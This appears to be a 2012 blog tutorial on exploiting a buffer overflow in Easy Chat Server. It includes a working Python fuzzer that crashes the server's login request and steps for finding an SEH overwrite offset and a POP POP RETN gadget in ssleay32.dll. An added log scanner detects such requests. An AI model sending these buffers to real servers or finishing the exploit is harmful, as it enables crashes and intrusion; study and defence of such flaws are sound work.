Wednesday, October 10, 2012

Software Exploitation : Easy Chat Server

Now I'm going to show you how to exploit an application called Easy Chat Server running on Windows XP SP3.

As shown in the image above, we can access the server with a browser on the BackTrack system.

Because this is a web application, we capture its traffic with Wireshark.

From the capture above we can see that the login is sent as a GET request, so that is the request we will use for the exploitation.

Our first fuzzer:

#!/usr/bin/python
# Sends the login request seen in the Wireshark capture over a raw TCP socket,
# with both the username and the password replaced by a long buffer.
import socket

target = "192.168.1.101"
target_port = 80
data = "\x41" * 5000  # 5000 'A' bytes
buff = "GET /chat.ghp?username=" + data + "&password=" + data + "&room=1 HTTP/1.1\r\n"
buff += "Host:192.168.1.101\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, target_port))
# The empty line terminates the HTTP headers; encode() keeps this working on Python 2 and 3.
sock.sendall((buff + "\r\n\r\n").encode())
print("Sukses....!!")
sock.close()
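From the defender's side, the request this fuzzer sends is easy to spot in the server's access log: a GET to chat.ghp whose username or password parameter is thousands of bytes long, where a real login carries a few characters. The following is an added example, not code from the original post; it scans constructed Common Log Format lines (the log format, the 256-byte limit and the sample entries are assumptions) and reports such requests.

```python
#!/usr/bin/env python3
"""Flag Easy Chat Server log entries whose chat.ghp parameters are oversized."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log in Common Log Format (not captured from a real
# server): one normal login, then requests shaped like the fuzzer's buffers.
SAMPLE_LOG = """\
192.168.1.100 - - [10/Oct/2012:10:01:12 +0700] "GET /chat.ghp?username=alice&password=secret&room=1 HTTP/1.1" 200 512
192.168.1.100 - - [10/Oct/2012:10:01:40 +0700] "GET /chat.ghp?username={a}&password={a}&room=1 HTTP/1.1" 200 0
192.168.1.100 - - [10/Oct/2012:10:02:03 +0700] "GET /index.html HTTP/1.1" 200 2048
192.168.1.100 - - [10/Oct/2012:10:02:30 +0700] "GET /chat.ghp?username={p}&password={p}&room=1 HTTP/1.1" 200 0
""".format(a="A" * 5000, p="Aa0Aa1Aa2Aa3" * 400)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
MAX_PARAM_LEN = 256  # assumption: real usernames and passwords are far shorter
WATCHED_PATH = "/chat.ghp"  # the login endpoint seen in the Wireshark capture


def oversized_params(target, limit=MAX_PARAM_LEN):
    """Return {param: longest value length} for query parameters longer than limit."""
    found = {}
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        longest = max(len(v) for v in values)
        if longest > limit:
            found[name] = longest
    return found


def scan_log(text, limit=MAX_PARAM_LEN):
    """Return one finding per request to chat.ghp that carries an oversized parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or urlsplit(m["target"]).path.lower() != WATCHED_PATH:
            continue
        bad = oversized_params(m["target"], limit)
        if bad:
            findings.append({"ip": m["ip"], "ts": m["ts"], "params": bad})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} oversized chat.ghp parameters: {f['params']}")
```

Both the plain 5000-byte buffer and the pattern_create style buffer are reported, while the normal login and the unrelated index.html request are not.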

Now we can see what happens in the SEH chain (View + SEH chain in OllyDbg).

Then press Shift+F9 and look at this picture:

Looking for a stepping stone

A stepping stone is a module that contains a POP POP RETN sequence. I chose ssleay32.dll from the Easy Chat Server installation folder.
As we can see in the picture, the bits in the second byte are zero, so the module is not protected by SafeSEH. Now we look for POP POP RETN sequences in the module ssleay32.dll.

root@bt:/opt/metasploit/msf3# ./msfpescan -p /root/ssleay32.dll

We can use the POP POP RETN sequence at address 0x1001b9a2.

In OllyDbg select the menu View + Executable modules, then double click ssleay32.dll.

In this module window, right click + Search for + Sequence of commands.

A new window will appear; fill it with the POP POP RETN sequence we are looking for.

Click the Find button and a new window will appear again.

Seeking the offset that overwrites SEH

In this step we can use ./pattern_create.rb.

Feed the output of pattern_create (chatpattern.txt) into our fuzzer in place of the 'A' buffer.

Then OllyDbg will look like the following:

Then press Shift+F9, and we will see the contents of EIP.

We can use pattern_offset.rb to determine how many bytes into the fuzzer's buffer EIP is overwritten.

With these results, we modify our fuzzer as follows:

Run the fuzzer and look in OllyDbg:

Press Shift+F9 and see what happens in EIP.
